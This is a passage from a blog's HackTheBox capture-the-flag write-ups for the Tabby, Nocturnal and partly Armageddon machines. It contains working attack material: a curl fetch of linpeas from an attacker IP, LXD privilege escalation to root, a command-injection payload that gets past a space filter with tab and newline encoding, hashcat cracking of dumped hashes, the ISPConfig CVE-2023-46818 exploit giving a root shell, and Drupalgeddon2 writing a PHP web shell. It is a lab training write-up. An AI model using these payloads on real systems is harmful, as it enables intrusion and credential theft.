Ss 11:11 0:00 /usr/bin/VGAuthService root 723 0.0 0.3 162004 7860 ? S\u0026lt;sl 11:11 0:12 /usr/bin/vmtoolsd root 847 0.0 0.3 235548 7296 ? Ssl 11:11 0:00 /usr/lib/accountsservice/accounts-daemon message+ 848 0.0 0.2 7512 4604 ? Ss 11:11 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only └─(Caps) 0x0000000020000000=cap_audit_write root 854 0.0 0.1 81944 3748 ? Ssl 11:11 0:00 /usr/sbin/irqbalance --foreground syslog 856 0.0 0.2 224324 5344 ? Ssl 11:11 0:00 /usr/sbin/rsyslogd -n -iNONE root 857 0.0 1.6 926232 33124 ? Ssl 11:11 0:02 /usr/lib/snapd/snapd root 858 0.0 0.3 16864 7808 ? Ss 11:11 0:00 /lib/systemd/systemd-logind root 895 0.0 0.1 6812 2992 ? Ss 11:11 0:00 /usr/sbin/cron -f daemon[0m 934 0.0 0.1 3792 2280 ? Ss 11:11 0:00 /usr/sbin/atd -f ash 78178 0.0 0.2 13896 5412 ? S 17:15 0:00 _ sshd: ash@pts/2 ash 78181 0.0 0.2 8544 5464 pts/2 Ss+ 17:15 0:00 _ -bash ash 78265 0.0 0.5 24760 11216 pts/2 S 17:18 0:00 _ curl http://10.10.14.21/linpeas.sh ash 78266 0.6 0.2 9260 5984 pts/2 S 17:18 0:00 _ bash ash 81771 0.0 0.1 9260 4068 pts/2 S 17:18 0:00 _ bash ash 81775 0.0 0.1 9208 3636 pts/2 R 17:18 0:00 | _ ps fauxwww ash 81773 0.0 0.1 9260 2776 pts/2 R 17:18 0:00 _ bash ash 81774 0.0 0.1 9260 2776 pts/2 S 17:18 0:00 _ bash root 956 0.0 0.0 5828 1852 tty1 Ss+ 11:11 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux tomcat 960 0.1 8.6 3094604 175680 ? 
Ssl 11:11 0:38 /usr/lib/jvm/default-java/bin/java -Djava.util.logging.config.file=/var/lib/tomcat9/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -classpath /usr/share/tomcat9/bin/bootstrap.jar:/usr/share/tomcat9/bin/tomcat-juli.jar -Dcatalina.base=/var/lib/tomcat9 -Dcatalina.home=/usr/share/tomcat9 -Djava.io.tmpdir=/tmp org.apache.catalina.startup.Bootstrap start └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 1399 0.0 0.0 2608 600 ? S 11:17 0:00 _ /bin/sh └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 1419 0.0 0.4 15968 10104 ? S 11:18 0:00 | _ python3 -c import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;) └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 1420 0.0 0.2 8568 5608 pts/0 Ss+ 11:18 0:00 | _ /bin/bash └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 77260 0.0 0.0 2608 608 ? S 16:55 0:00 _ /bin/sh └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 77273 0.0 0.4 15708 9796 ? S 16:55 0:00 _ python3 -c import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;) └─(Caps) 0x0000000000000400=cap_net_bind_service tomcat 77274 0.0 0.2 8436 5452 pts/1 Ss 16:55 0:00 _ /bin/bash └─(Caps) 0x0000000000000400=cap_net_bind_service root 77714 0.0 0.2 8776 4196 pts/1 S 17:07 0:00 _ su ash ash 77738 0.0 0.2 8312 5352 pts/1 S+ 17:07 0:00 _ bash root 973 0.0 0.8 193420 17916 ? Ss 11:11 0:00 /usr/sbin/apache2 -k start www-data 990 0.0 0.4 193888 9792 ? S 11:11 0:00 _ /usr/sbin/apache2 -k start www-data 993 0.0 0.4 193872 9776 ? S 11:11 0:00 _ /usr/sbin/apache2 -k start www-data 1252 0.0 0.6 193872 12308 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1254 0.0 0.6 193888 13444 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1255 0.0 0.4 193864 9740 ? 
S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1256 0.0 0.4 193872 9764 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1257 0.0 0.4 193888 9788 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 1258 0.0 0.4 193888 9776 ? S 11:12 0:00 _ /usr/sbin/apache2 -k start www-data 35324 0.0 0.4 193856 9632 ? S 11:39 0:00 _ /usr/sbin/apache2 -k start www-data 35326 0.0 0.3 193824 7816 ? S 11:39 0:00 _ /usr/sbin/apache2 -k start root 983 0.0 0.3 232700 6908 ? Ssl 11:11 0:00 /usr/lib/policykit-1/polkitd --no-debug ash 77728 0.0 0.4 18672 10004 ? Ss 17:07 0:00 /lib/systemd/systemd --user ash 77732 0.0 0.1 105464 3480 ? S 17:07 0:00 _ (sd-pam) ash 81372 0.0 0.1 7084 3992 ? Ss 17:18 0:00 _ /usr/bin/dbus-daemon[0m --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 81391 0.3 0.0 2616 1936 ? Ss 17:18 0:00 /bin/sh /snap/lxd/21468/commands/daemon.start root 81570 1.1 2.6 1458640 53604 ? Sl 17:18 0:00 _ lxd --logfile /var/snap/lxd/common/lxd/logs/lxd.log --group lxd root 81557 0.0 0.0 85608 2016 ? 
Sl 17:18 0:00 lxcfs /var/snap/lxd/common/var/lib/lxcfs -p /var/snap/lxd/common/lxcfs.pid ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 process found (dump creds from memory as root) sshd: process found (dump creds from memory as root) ╔══════════╣ Processes whose PPID belongs to a different user (not root) ╚ You will know if a user can somehow spawn processes as a different user Proc 77714 with ppid 77274 is run by user root but the ppid user is tomcat ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information ash@tabby:~$ groups ash ash : ash adm cdrom dip plugdev lxd lxd group privilege escalation - root flag We find a tutorial for exploiting lxd: https://amanisher.medium.com/lxd-privilege-escalation-in-linux-lxd-group-ec7cafe7af63 and a GitHub repo with the Alpine image to build and copy onto the machine: https://github.com/saghul/lxd-alpine-builder Membership of the lxd group is effectively root: the group can talk to the LXD daemon, which runs as root, so it can create a privileged container and mount the host\u0026rsquo;s root filesystem into it.\nash@tabby:~$ cd lxd-alpine-builder/ ash@tabby:~/lxd-alpine-builder$ ls alpine-v3.13-x86_64-20210218_0139.tar.gz ash@tabby:~/lxd-alpine-builder$ lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b ash@tabby:~/lxd-alpine-builder$ lxc image list +---------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE | 
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ | myimage | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | CONTAINER | 3.11MB | May 5, 2025 at 5:29pm (UTC) | +---------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ ash@tabby:~/lxd-alpine-builder$ lxc init myimage ignite -c security.privileged=true Creating ignite Error: No storage pool found. Please create a new storage pool ash@tabby:~/lxd-alpine-builder$ lxd init Would you like to use LXD clustering? (yes/no) [default=no]: Do you want to configure a new storage pool? (yes/no) [default=yes]: Name of the new storage pool [default=default]: Name of the storage backend to use (btrfs, dir, lvm, zfs, ceph) [default=zfs]: Create a new ZFS pool? (yes/no) [default=yes]: Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: Size in GB of the new loop device (1GB minimum) [default=5GB]: Would you like to connect to a MAAS server? (yes/no) [default=no]: Would you like to create a new local network bridge? (yes/no) [default=yes]: What should the new bridge be called? [default=lxdbr0]: What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: Would you like the LXD server to be available over the network? (yes/no) [default=no]: Would you like stale cached images to be updated automatically? (yes/no) [default=yes] Would you like a YAML \u0026#34;lxd init\u0026#34; preseed to be printed? 
(yes/no) [default=no]: ash@tabby:~/lxd-alpine-builder$ lxc init myimage ignite -c security.privileged=true Creating ignite ash@tabby:~/lxd-alpine-builder$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true Device mydevice added to ignite ash@tabby:~/lxd-alpine-builder$ lxc start ignite ash@tabby:~/lxd-alpine-builder$ lxc exec ignite /bin/sh ~ # cd /mnt/root/ /mnt/root # ls bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr boot dev home lib32 libx32 media opt root sbin srv tmp var /mnt/root # cd root /mnt/root/root # ls root.txt snap /mnt/root/root # cat root.txt 47a3.....74a4 Tips I should have understood the Tomcat roles and how they work better. The manager-script role only gives access to the Tomcat text API. I should have focused my research on the rights that come with that role to understand sooner how to upload a reverse shell. ","date":"2025-05-05T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/tabby-htb/","title":"HTB | Tabby"},{"content":" Machine name OS IP Difficulty Nocturnal Linux 10.10.11.64 Easy Users amanda : arHkG7HAI68X8s1J tobias : slowmotionapocalypse ## ISPConfig Dashboard admin : slowmotionapocalypse SystemInfo Ubuntu 20.04.6 LTS (Focal Fossa) Enumeration $ nmap -sC -sV -An -p- -vvv -T4 10.10.11.64 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA) | ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABgQDpf3JJv7Vr55+A/O4p/l+TRCtst7lttqsZHEA42U5Edkqx/Kb8c+F0A4wMCVOMqwyR/PaMdmzAomYGvNYhi3NelwIEqdKKnL+5svrsStqb9XjyShPD9SQK5Su7xBt+/TfJyJFRcsl7ZJdfc6xnNHQITvwa6uZhLsicycj0yf1Mwdzy9hsc8KRY2fhzARBaPUFdG0xte2MkaGXCBuI0tMHsqJpkeZ46MQJbH5oh4zqg2J8KW+m1suAC5toA9kaLgRis8p/wSiLYtsfYyLkOt2U+E+FZs4i3vhVxb9Sjl9QuuhKaGKQN2aKc8ItrK8dxpUbXfHr1Y48HtUejBj+AleMrUMBXQtjzWheSe/dKeZyq8EuCAzeEKdKs4C7ZJITVxEe8toy7jRmBrsDe4oYcQU2J76cvNZomU9VlRv/lkxO6+158WtxqHGTzvaGIZXijIWj62ZrgTS6IpdjP3Yx7KX6bCxpZQ3+jyYN1IdppOzDYRGMjhq5ybD4eI437q6CSL20= | 256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcnMmaOpYYv5IoOYfwkaYqI9hP6MhgXCT9Cld1XLFLBhT+9SsJEpV6Ecv+d3A1mEOoFL4sbJlvrt2v5VoHcf4M= | 256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIASsDOOb+I4J4vIK5Kz0oHmXjwRJMHNJjXKXKsW0z/dy 80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://nocturnal.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.18.0 (Ubuntu) Foothold File upload We find a website where we can register and upload files. After a lot of searching I found no flaw that would let me upload a shell or execute PHP; nothing seemed vulnerable.\nBy uploading my own files and analysing the request in Burp, I discovered that it is possible to check whether a user exists or not. Better still, if the user exists and you ask for a file name that is wrong, the page lists the other files available for that user!\nFirst I made the request in Burp. When the username is wrong, the response size was 2985 bytes. That is the important piece of information for fuzzing usernames afterwards: 
if the response to the request has a different size, the user probably exists.\nHere is the request used to fuzz usernames, with the keyword FUZZ in the right place:\n~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » cat dl.req GET /view.php?username=FUZZ\u0026amp;file=a.pdf HTTP/1.1 Host: nocturnal.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://nocturnal.htb/dashboard.php Cookie: PHPSESSID=u9iupob4f8khh30retevlt8gc6 Upgrade-Insecure-Requests: 1 Priority: u=0, i Then I use ffuf with a username list from SecLists. The -fs 2985 option filters out every response of size 2985, so only usernames whose response has a different size are shown. 
To match on a size instead (\u0026ldquo;equal to\u0026rdquo;), you would write -ms:\n~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » ffuf -request dl.req -request-proto http -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -fs 2985 /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://nocturnal.htb/view.php?username=FUZZ\u0026amp;file=a.pdf :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt :: Header : Accept-Encoding: gzip, deflate, br :: Header : Cookie: PHPSESSID=u9iupob4f8khh30retevlt8gc6 :: Header : Upgrade-Insecure-Requests: 1 :: Header : Priority: u=0, i :: Header : Host: nocturnal.htb :: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 :: Header : Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 :: Header : Connection: keep-alive :: Header : Referer: http://nocturnal.htb/dashboard.php :: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 2985 ________________________________________________ admin [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 26ms] hello [Status: 200, Size: 3118, Words: 1175, Lines: 129, Duration: 21ms] amanda [Status: 200, Size: 3113, Words: 1175, Lines: 129, Duration: 20ms] tobias [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 19ms] We find several usernames, among them amanda, which is valid and has a privacy file with a password inside:\nGET /view.php?username=amanda\u0026amp;file=privacy.odt HTTP/1.1 Host: nocturnal.htb ... -------------- Dear Amanda, Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure. The file has been created and provided by Nocturnal\u0026#39;s IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us. Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter. Yours sincerely, Nocturnal\u0026#39;s IT team Amanda - Admin Dashboard The admin dashboard can create a backup of the files. Commands can be injected through the field that sets the zip password. The trick is to get past the filter that forbids spaces, \u0026#39;;\u0026#39; and so on. %09 is a horizontal tab, which the shell treats as a word separator just like a space, so it survives a filter that only blocks 0x20; %0A is a newline, which ends the zip command so that what follows runs as a command of its own. Always test this kind of thing in Burp!! 
En faisant directement dans la part\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /admin.php HTTP/1.1 Host: nocturnal.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 95 Origin: http://nocturnal.htb Connection: keep-alive Referer: http://nocturnal.htb/admin.php Cookie: PHPSESSID=h28ba7dgkhrqt67c0ktleof1d1 Upgrade-Insecure-Requests: 1 Priority: u=0, i password=%0Abash%09-c%09\u0026#34;base64%09/var/www/nocturnal_database/nocturnal_database.db\u0026#34;%0A\u0026amp;backup= nocturnal.db On peut maintenant dumper la db et casser le hachage du mot de passe de :\n1 2 3 4 5 6 7 8 9 10 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » sqlite3 ~/Téléchargements/download.sqlite SQLite version 3.46.1 2024-08-13 09:16:08 Enter \u0026#34;.help\u0026#34; for usage hints. sqlite\u0026gt; .tables uploads users sqlite\u0026gt; select * from users; 1|admin|d725aeba143f575736b07e045d8ceebb 2|amanda|df8b20aa0c935023f99ea58358fb63c4 4|tobias|55c82b1ccd55ab219b3b109b07d5061d 6|test|098f6bcd4621d373cade4e832627b4f6 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting ... 
Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 2 secs 55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse Session..........: hashcat Status...........: Cracked Hash.Mode........: 0 (MD5) Hash.Target......: 55c82b1ccd55ab219b3b109b07d5061d Time.Started.....: Wed Apr 16 14:57:40 2025 (1 sec) Time.Estimated...: Wed Apr 16 14:57:41 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 12149.4 kH/s (4.50ms) @ Accel:2048 Loops:1 Thr:32 Vec:1 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 4128768/14344385 (28.78%) Rejected.........: 0/4128768 (0.00%) Restore.Point....: 3538944/14344385 (24.67%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: stefy06 -\u0026gt; ruddsound1 Hardware.Mon.#1..: Temp: 35c Fan: 46% Util: 29% Core:1544MHz Mem:3802MHz Bus:16 Started: Wed Apr 16 14:57:29 2025 Stopped: Wed Apr 16 14:57:42 2025 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --show 55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse 1 2 3 4 5 6 7 8 9 10 ~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal (main*) » ssh -L 8888:localhost:8080 tobias@nocturnal.htb tobias@nocturnal.htb\u0026#39;s password: Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-212-generic x86_64) ... Last login: Wed Apr 16 12:59:25 2025 from 10.10.14.10 tobias@nocturnal:~$ ls user.txt tobias@nocturnal:~$ cat user.txt 7922.....0dd3 Privilege Escalation netstat -ano - port forwarding 8080 On découvre un port 8080 ouvert uniquement de l\u0026rsquo;interieur. 
On decide de faire du port forwarding pour voir la page web sur notre navigateur:\n1 ssh -L 8888:localhost:8080 tobias@nocturnal.htb ISPConfig 3.2.10p1 On découvre une page web \u0026ldquo;ISPConfig\u0026rdquo; On peut se connecter au compte \u0026ldquo;admin\u0026rdquo; avec le mot de passe de tobias \u0026ldquo;slowmotionapocalypse\u0026rdquo;. On trouve un dashboard et on identifie la version \u0026ldquo;3.2.10p1\u0026rdquo;.\nExploit : Authenticated RCE ISPConfig Avec searchsploit, on ne trouve que d\u0026rsquo;anciennes vulnérabilités. Cependant, sur google on trouve un lien vers un POC qui semble plus récent : https://packetstorm.news/files/id/176126\n\u0026ldquo;ISPConfig versions 3.2.11 and below suffer from a PHP code injection vulnerability in language_edit.php.\u0026rdquo;\nOn observe ici le parametre \u0026ldquo;lang_file\u0026rdquo; qui est injectable.\n1 2 curl_setopt($ch, CURLOPT_URL, \u0026#34;{$url}admin/language_edit.php\u0026#34;); curl_setopt($ch, CURLOPT_POSTFIELDS, \u0026#34;lang=en\u0026amp;module=help\u0026amp;lang_file={$lang_file}\u0026#34;); En utilisant le POC, et les credentials admin, on obtient directement un shell en tant que root :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 » php exploit.php http://localhost:8888/ admin slowmotionapocalypse ------------------------------------------------------------------------ ISPConfig \u0026lt;= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability ------------------------------------------------------------------------ [-] Software Link: https://www.ispconfig.org [-] Affected Versions: Version 3.2.11 and prior versions. 
[-] Vulnerabilities Description: User input passed through the \u0026#34;records\u0026#34; POST parameter to /admin/language_edit.php is not properly sanitized before being used to dynamically generate PHP code that will be executed by the application. This can be exploited by malicious administrator users to inject and execute arbitrary PHP code on the web server. [-] Proof of Concept: https://karmainsecurity.com/pocs/CVE-2023-46818.php (Packet Storm Editor Note: See bottom of this file for PoC) [-] Solution: Upgrade to version 3.2.11p1 or later. [-] Disclosure Timeline: [25/10/2023] - Vendor notified [26/10/2023] - Version 3.2.11p1 released [27/10/2023] - CVE identifier assigned [07/12/2023] - Publication of this advisory [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46818 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: https://karmainsecurity.com/KIS-2023-13 [-] Other References: https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/ --- CVE-2023-46818.php PoC --- [+] Logging in with username \u0026#39;admin\u0026#39; and password \u0026#39;slowmotionapocalypse\u0026#39; [+] Injecting shell [+] Launching shell ispconfig-shell# whoami root ispconfig-shell# cat /root/root.txt 9b18.....21bf Tips J\u0026rsquo;ai découvert qu\u0026rsquo;on pouvait vérifier facilement si un utilisateur existait en faisant une requete specifique. J\u0026rsquo;ai meme pensé à faire un Fuzz, eventuellement avec Burp Sniper ou un autre outil. Je n\u0026rsquo;ai pas essayé et je suis aller voir le write up\u0026hellip; C\u0026rsquo;était bien ça la solution\u0026hellip;\nLorsqu\u0026rsquo;on trouve une entrée utilisateur injectable, toujours faire des tests dans BURP !! Ou avec curl (à la rigueur). Mais jamais directement sur la page web. Ici, il fallait utilisé %0a pour remplacer un caractère espace. 
Le problème c\u0026rsquo;est que ca n\u0026rsquo;a pas fonctionné car c\u0026rsquo;était remplacé par \u0026ldquo;%XX%XX\u0026rdquo; avec d\u0026rsquo;autre valeur a cause de l\u0026rsquo;URL encoding. Attention donc a bien testé les parametres injectables directement dans BURP pour eviter qu\u0026rsquo;il y ait un URL encoding qui s\u0026rsquo;applique sans qu\u0026rsquo;on le sache.\n","date":"2025-04-16T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/nocturnal-htb/","title":"HTB | Nocturnal"},{"content":" Machine name OS IP Difficulty Armageddon Linux 10.10.10.79 Easy Users 1 2 drupaluser : CQHEy@9M*m23gBVj brucetherealadmin Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ┌──(kali㉿kali)-[~/htb/Armageddon] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.233 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDC2xdFP3J4cpINVArODYtbhv+uQNECQHDkzTeWL+4aLgKcJuIoA8dQdVuP2UaLUJ0XtbyuabPEBzJl3IHg3vztFZ8UEcS94KuWP09ghv6fhc7JbFYONVJTYLiEPD8nrS/V2EPEQJ2ubNXcZAR76X9SZqt11JTyQH/s6tPH+m3m/84NUU8PNb/dyhrFpCUmZzzJQ1zCDStLXJnCAOE7EfW2wNm1CBPCXn1wNvO3SKwokCm4GoMKHSM9rNb9FjGLIY0nq+8mt7RTJZ+WLdHsje3AkBk1yooGFF+0TdOj42YK2OtAKDQBWnBm1nqLQsmm/Va9T2bPYLLK5aUd4/578u7h | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE4kP4gQ5Th3eu3vz/kPWwlUCm+6BSM6M3Y43IuYVo3ppmJG+wKiabo/gVYLOwzG7js497Vr7eGIgsjUtbIGUrY= | 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG9ZlC3EA13xZbzvvdjZRWhnu9clFOUe7irG8kT0oR4A 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) | http-robots.txt: 36 disallowed entries | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt 
/INSTALL.sqlite.txt /install.php /INSTALL.txt\n| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php\n| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/\n| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/\n| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/\n|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/\n|_http-title: Welcome to Armageddon | Armageddon\n|_http-generator: Drupal 7 (http://drupal.org)\n|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16\n| http-methods:\n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D\nFoothold\nDrupal 7.56\nIn the source code we notice the version of the framework in use: Drupal 7.\nWe find the directory http://10.10.10.233/scripts/. The scripts are dated 21 June 2017.\nLooking at the Drupal releases on GitHub, we discover that Drupal 7.56 was released on exactly that date: https://github.com/drupal/drupal/releases/tag/7.56\nWith searchsploit, we find an RCE (without prior authentication):\n┌──(kali㉿kali)-[~/htb/Armageddon]\n└─$ searchsploit drupal 7.56\n--------------------------------------------------------------- ---------------------------------\n Exploit Title | Path\n--------------------------------------------------------------- ---------------------------------\n...\nDrupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb\n... 
Output:\n┌──(kali㉿kali)-[~/htb/Armageddon]\n└─$ ruby drupalggedon2.rb http://10.10.10.233\n[*] --==[::#Drupalggedon2::]==--\n--------------------------------------------------------------------------------\n[i] Target : http://10.10.10.233/\n--------------------------------------------------------------------------------\n[+] Found : http://10.10.10.233/CHANGELOG.txt (HTTP Response: 200)\n[+] Drupal!: v7.56\n--------------------------------------------------------------------------------\n[*] Testing: Form (user/password)\n[+] Result : Form valid\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n[*] Testing: Clean URLs\n[!] Result : Clean URLs disabled (HTTP Response: 404)\n[i] Isn't an issue for Drupal v7.x\n--------------------------------------------------------------------------------\n[*] Testing: Code Execution (Method: name)\n[i] Payload: echo YAQXUKKI\n[+] Result : YAQXUKKI\n[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\n--------------------------------------------------------------------------------\n[*] Testing: Existing file (http://10.10.10.233/shell.php)\n[!] Response: HTTP 200 // Size: 6. ***Something could already be there?***\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n[*] Testing: Writing To Web Root (./)\n[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php\n[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }\n[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!! 
